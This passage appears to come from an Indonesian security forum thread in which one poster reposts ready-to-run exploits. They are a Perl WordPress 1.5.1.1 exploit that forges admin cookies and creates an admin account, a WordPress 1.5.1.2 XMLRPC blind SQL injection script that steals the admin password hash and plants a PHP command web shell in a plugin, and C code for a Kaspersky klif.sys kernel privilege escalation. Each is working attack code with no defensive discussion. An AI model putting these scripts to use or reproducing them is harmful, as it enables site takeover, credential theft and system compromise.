if($res->content =~ m/(?::Roll Eyes(.*)(?::Roll Eyes([a-f0-9]{32})(?::Roll Eyes(<\/title>)/)
{
$login = $1; $hash = $2;
print "\n>> LOGIN : $login\n>> HASH : $hash\n\n";
}
else { print "ERROR : Forum not vulnerable or bad prefix."; exit(); }

$cookie_jar = HTTP::Cookies->new();
($cpath = $path) =~ s!/$!!;
$hash = md5_hex($hash);
($host = $cpath) =~ s!http://([^/]*).*!$1!;
$cpath = md5_hex($cpath);

$xpl->cookie_jar( $cookie_jar );

$cookie_jar->set_cookie( "0","wordpresspass_$cpath","$hash","/",$host,,,,,);
$cookie_jar->set_cookie( "1","wordpressuser_$cpath","$login","/",$host,,,,,);
print " +---

    * STEP 2 - CREATE NEW USER\n";

$reg = $path;
$reg .= 'wp-admin/users.php';
$res = $xpl->post("$reg",
{
"action" => "adduser",
"user_login" => "r57",
"firstname" => "RST",
"lastname" => "GHC",
"email" => "digitalcat\ @usa.com",
"uri" => "xcode.or.id",
"pass1" => "r57",
"pass2" => "r57",
"adduser" => "Submit",
},
Referer => $reg
);
print " +---

    * STEP 3 - GET ID OF NEW USER\n";

$reg = $path;
$reg .= 'wp-admin/users.php';
$res = $xpl->get("$reg",Referer => $reg);
 @res = split(/\n/,$res->content);
$id = 0;
for( @res)
{
if(/(?:\<td align=\'center\'\>)([0-9]*)(?:\<\/td\>)/) { $id = $1; }
if(/\<td\>\<strong\>r57\<\/strong\>\<\/td\>/) { last; }
}
die "ERROR : ", $res->status_line unless $res->is_success;
if($id != 0) { print "\n>> ID : $id\n\n"; }
else { print "[-] ERROR : CAN'T GET NEW USER ID\n"; exit(); }
print " +---

    * STEP 4 - LEVEL UP FOR NEW USER\n\n";

$reg = $path;
$reg .= 'wp-admin/users.php?action=promote&id='.$id.'&prom=up';
for($i=0;$i<10;$i++)
{
print ">> LEVEL UP # $i\n";
$res = $xpl->get("$reg",Referer => $reg);
die "ERROR : ", $res->status_line unless $res->is_success;
}
print "\nTHATS ALL. NOW YOU CAN LOGIN WITH USERNAME 'r57' AND PASSWORD 'r57'\n";

sub usage()
{
&header();
print "USAGE : r57wp.pl [OPTIONS]\n";
print "\noptions:\n\n";
print "-h [path]\n";
print " Path to wordpress installed\n";
print "-p [prefix] (optional)\n";
print " Database tables prefix (default 'wp_')\n\n";
print "e.g.: r57wp.pl -h http://blah.com/wordpress/\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
print "(c)oded by digital cat";
print "RST/GHC\n";
print "http://xcode.or.id\n";
exit();
}
sub header()
{
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
print " WordPress 1.5.1.1 exploit \n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
}

Terima Kasih.......

Digital Cat · Post by **Digital Cat** » Fri Jul 24, 2009 6:58 pm

WordPress 1.5.1.2 XMLRPC Module Remote SQL Injection Exploit

Code: Select all

#!/usr/bin/perl -w
use LWP::UserAgent;
use Digest::MD5 qw(md5_hex);

my $ua = new LWP::UserAgent;
$ua->agent("Wordpress Hash Grabber v1.0" . $ua->agent);

my  @char = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");

my $host = $ARGV[0]; # The path to xmlrpc.php
my $user = $ARGV[1]; # The target login, default wp user is admin
my $post = $ARGV[2]; # Must be a valid pingback or part
my $exec = $ARGV[3]; # Command to execute
my $pref = 'wp_'; # database prefix!
my $hash = '';

if ( !$ARGV[2] )
{
die("Im Not Psychic ..\n");
}

print "

    * Trying Host $host ...\n";


my $res = $ua->get($host.'/xmlrpc.php');

if ( $res->content =~ /XML-RPC server accepts POST requests only/is )
{
print "

    * The XMLRPC server seems to be working \n";

}
else
{
print "[!] Something seems to be wrong with the XMLRPC server \n ";
open(LOG, ">wp_out.html"); print LOG $res->content;
exit;
}

for( $i=1; $i < 33; $i++ )
{
for( $j=0; $j < 16; $j++ )
{
my $sql = "<?xml version=\"1.0\"?><methodCall>
<methodName>pingback.ping</methodName>
<params><param><value>
<string>foobar' UNION SELECT 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 FROM " . $pref . "
users WHERE (user_login='$user' AND MID(user_pass,$i,1)='$char[$j]')/*</string>
</value></param><param><value><string>$host/?p=$post#$post</string>
</value></param><param><value><string>admin</string></value>
</param></params></methodCall>";
my $req = new HTTP::Request POST => $host . "/xmlrpc.php";
$req->content($sql);
$res = $ua->request($req);
$out = $res->content;

if ( $out =~ /The pingback has already been registered/)
{
$hash .= $char[$j];
print "

    * Char $i is $char[$j]\n";

last;
}

}

if ( length($hash) < 1 )
{
open(LOG, ">wp_out.html"); print LOG $out;

print "[!] $host not vulnerable? Better verify manually!\n";
exit;
}
if ( $out =~ /<value><int>0<\/int><\/value>/)
{
print "[!] Invalid post information specified! \n";
exit;
}
if ( $out =~ /different number of columns/is || $hash =~ /([0]{5})/ )
{
open(LOG, ">wp_out.html"); print LOG $out;

print "[!] The database structured has been altered, check manually \n";
exit;
}

}

print "

    * Host : $host\n";

print "

    * User : $user\n";

print "

    * Hash : $hash\n";

print "

    * Attempting to create shell .. \n";
my $ckey = md5_hex($host);
$hash = md5_hex($hash);

my  @cookie = ('Referer' => $host.'/wp-admin/plugins.php;','Cookie' =>
'wordpressuser_'.$ckey.'='.$user.'; wordpresspass_'.$ckey.'='. $hash);
$res = $ua->get($host.'/wp-admin/plugin-editor.php',  @cookie);

if ( $res->content =~ /<strong>(.*)\.php<\/strong>/i )
{
my  @list = ($1.'.php', 'hello.php', 'markdown.php', 'textile1.php');
my $file;


foreach $file ( @list)
{

print "

    * Trying filename $file ...\n";

$res = $ua->get($host.'/wp-admin/plugin-editor.php?file='.$file,  @cookie);

if ( $res->content =~ /<textarea[^>]*>(.*)<\/textarea>/is )
{
my $data = $1;

$data =~ s/>/>/ig;
$data =~ s/</</ig;
$data =~ s/"/"/ig;
$data =~ s/&/&/ig;

my $add = ( $data =~ /<cmdout>(.*)<\/cmdout>/is ) ? '': '<cmdout>
<?php if ( !empty($_REQUEST["cmd"]) ) passthru($_REQUEST["cmd"]); ?></cmdout>';

$res = $ua->post($host . "/wp-admin/plugin-editor.php",
['newcontent' => $add.$data, 'action' => 'update', 'file' => $file, 'submit' => 'foobar'],  @cookie);

print "

    * Trying to activate $file ... \n";

$res = $ua->get($host.'/wp-admin/plugins.php?action=activate&plugin='.$file ,  @cookie);

print "

    * Trying to execute $exec ... \n";

$res = $ua->get($host.'/wp-admin/plugins.php?cmd='.$exec,  @cookie);

if ( $res->content =~ /<cmdout>(.*)<\/cmdout>/is )
{
# Send results to STDOUT
print "

    * Successfully executed $exec\n\n\n";

print $1;
exit;
}
else
{

print "[!] Couldnt execute command $exec\n";
open(LOG, ">wp_out.html"); print LOG $res->content;

print "[!] Trying to access $file directly!\n";
$res = $ua->get($host.'/wp-content/plugins/'.$file.'?cmd='.$exec,  @cookie);

if ( $res->content =~ /<cmdout>(.*)<\/cmdout>/is )
{
# Send results to STDOUT
print "

    * Successfully executed $exec\n\n\n";

print $1;
exit;
}
else
{

print "[!] Couldnt execute command $exec\n";
print "

    * Try $host/wp-content/plugins/$file manually\n";

}
}
}
else
{

print "[!] Could not read file $file \n";
open(LOG, ">wp_out.html"); print LOG $res->content . $file;
}

}

}
else
{

print "[!] Could Not Get Plugin Information\n";
open(LOG, ">wp_out.html"); print LOG $res->content;
}

exit;

Terima Kasih.......

Digital Cat · Post by **Digital Cat** » Fri Jul 24, 2009 7:00 pm

Kaspersky AntiVirus 5.x "klif.sys" Local Privilege Exploit

Advisory : FrSIRT/ADV-2005-0696
Rated as : Moderate Risk

Code: Select all

#include <windows.h>

PUCHAR pCodeBase=(PUCHAR)0xBE9372C0;

PDWORD pJmpAddress=(PDWORD)0xBE9372B0;

PUCHAR pKAVRets[]={(PUCHAR)0xBE935087,(PUCHAR)0xBE935046};

PUCHAR pKAVRet;


unsigned char code[]={0x68,0x00,0x02,0x00,0x00, //push 0x200
0x68,0x00,0x80,0x93,0xBE, //push <buffer address> - 0xBE938000
0x6A,0x00, //push 0
0xB8,0x00,0x00,0x00,0x00, //mov eax,<GetModuleFileNameA> -> +13
0xFF,0xD0, //call eax
0x68,0x00,0x80,0x93,0xBE, //push <buffer address>
0x68,0x00,0x82,0x93,0xBE, //push <address of the notepad path>- 0xBE938200
0xB8,0x00,0x00,0x00,0x00, //mov eax,<lstrcmpiA> -> +30
0xFF,0xD0, //call eax
0x85,0xC0, //test eax,eax
0x74,0x03, //je +03
0xC2,0x04,0x00, //retn 4
0x6A,0x00, //push 0
0x68,0x00,0x84,0x93,0xBE, //push <address of the message string>- 0xBE938400
0x68,0x00,0x84,0x93,0xBE, //push <address of the message string>- 0xBE938400
0x6A,0x00, //push 0
0xB8,0x00,0x00,0x00,0x00, //mov eax,<MessageBoxA> -> +58
0xFF,0xD0, //call eax
0xC2,0x04,0x00 //retn 4
};

unsigned char jmp_code[]={0xFF,0x25,0xB0,0x72,0x93,0xBE};
//jmp dword prt [0xBE9372B0]

//////////////////////////////////////////////////////////////

BOOLEAN LoadExploitIntoKernelMemory(void){



//Get function's addresses

HANDLE hKernel=GetModuleHandle("KERNEL32.DLL");
HANDLE hUser=GetModuleHandle("USER32.DLL");

FARPROC pGetModuleFileNameA=GetProcAddress(hKernel,"GetModuleFileNameA");
FARPROC plstrcmpiA=GetProcAddress(hKernel,"lstrcmpiA");

FARPROC pMessageBoxA=GetProcAddress(hUser,"MessageBoxA");

*(DWORD*)(code+13)=(DWORD)pGetModuleFileNameA;
*(DWORD*)(code+30)=(DWORD)plstrcmpiA;
*(DWORD*)(code+58)=(DWORD)pMessageBoxA;

//Prepare our data into ring0-zone.

PCHAR pNotepadName=(PCHAR)0xBE938200;

char temp_buffer[MAX_PATH];
char *s;

SearchPath(NULL,"NOTEPAD",".EXE",sizeof(temp_buffer),temp_buffer,&s);

lstrcpy(pNotepadName,temp_buffer);

PCHAR pMessage=(PCHAR)0xBE938400;

lstrcpy(pMessage,"Notepad is running!!! KAV is vulnerable!!!");

memmove(pCodeBase,code,sizeof(code));

*pJmpAddress=(DWORD)pCodeBase;

memmove(pKAVRet,jmp_code,sizeof(jmp_code));

return TRUE;
}

///////////////////////////////////////////////////////////////

void UnloadExploitFromKernelMemory(){

UCHAR retn_4[]={0xC2,0x04,0x00};

memmove(pKAVRet,retn_4,sizeof(retn_4));

}

/////////////////////////////////////////////////////////////////

PUCHAR GetKAVRetAddress(void){

//Check the retn 4 in the KAV 0xBE9334E1 function end
//Also, we check the KAV klif.sys existance.

UCHAR retn_4[]={0xC2,0x04,0x00};

__try{

for(DWORD i=0;i<sizeof(pKAVRets)/sizeof(pKAVRets[0]);i++){

if(memcmp(pKAVRets,retn_4,sizeof(retn_4))==0)
return pKAVRets;

}

}__except(EXCEPTION_EXECUTE_HANDLER){MessageBox(NULL,"KAV is
not installed",NULL,0);return NULL;}


MessageBox(NULL,"Wrong KAV version. You need 5.0.227, 5.0.228 or
5.0.335 versions of KAV",NULL,0);
return NULL;
}

/////////////////////////////////////////////////////////////////

void main(void){

pKAVRet=GetKAVRetAddress();

if(NULL==pKAVRet)
return;


if(!LoadExploitIntoKernelMemory())
return;

char temp_buffer[MAX_PATH];
char *s;

SearchPath(NULL,"NOTEPAD",".EXE",sizeof(temp_buffer),temp_buffer,&s);

PROCESS_INFORMATION pi;

STARTUPINFO si={0};
si.cb=sizeof(si);

CreateProcess(NULL,temp_buffer,NULL,NULL,FALSE,
0,NULL,NULL,&si,&pi);

WaitForSingleObject(pi.hProcess,INFINITE);

MessageBox(NULL,"Now you may start your own Notepad instance to
check this exploit!","KAV_EXPLOITER",0);

MessageBox(NULL,"Close this window to stop exploitation","KAV_EXPLOITER",0);

UnloadExploitFromKernelMemory();
}

Terima Kasih.......

*Cyber Security Forum (X-code) - PT. Teknologi Server Indonesia

Kumpulan Bugs

Re: Kumpulan Bugs

Re: Kumpulan Bugs

Re: Kumpulan Bugs

Re: Kumpulan Bugs

Re: Kumpulan Bugs

Re: Kumpulan Bugs

Re: Kumpulan Bugs

Re: Kumpulan Bugs

Re: Kumpulan Bugs

Re: Kumpulan Bugs